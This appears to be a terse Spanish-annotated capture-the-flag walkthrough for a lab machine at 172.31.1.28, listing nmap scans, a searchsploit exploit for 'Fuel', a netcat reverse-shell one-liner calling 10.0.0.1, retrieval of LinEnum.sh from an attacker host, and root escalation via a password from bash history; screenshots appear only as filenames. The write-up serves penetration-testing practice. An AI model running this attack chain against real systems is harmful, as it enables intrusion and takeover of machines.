nmap -A -p- -oA output 172.31.1.28 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210702100730.png

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.28 -oG allPorts

Pasted image 20210702102108.png

extractPorts allPorts

Pasted image 20210702102121.png

nmap -sC -sV -p1880 172.31.1.28 -oN targeted

Pasted image 20210702102200.png

nmap --script http-enum -p1880 172.31.1.28 -oN webScan

Pasted image 20210702102315.png

whatweb 172.31.1.28:80

Pasted image 20210702102505.png

cat targeted

Pasted image 20210702102654.png

Pasted image 20210702143951.png

Pasted image 20210702143930.png

Pasted image 20210702144853.png

seachsploit Fuel

searchsploit -m 47318.py

Modificamos el archivo

Pasted image 20210702144800.png

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

Pasted image 20210702151732.png

which python3

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo -l

No tenemos las credenciales para moira

Pasted image 20210702153210.png

python3 -m http.server 88888

wget http://10.10.0.12:8888/LinEnum.sh

chmod +x LinEnum.sh

Pasted image 20210702160837.png

su root

Ponemos la contrasena que se encontro en la historia de bash

Pasted image 20210702161639.png

boxes

copyright©2022 Cu3rv0x all rights reserved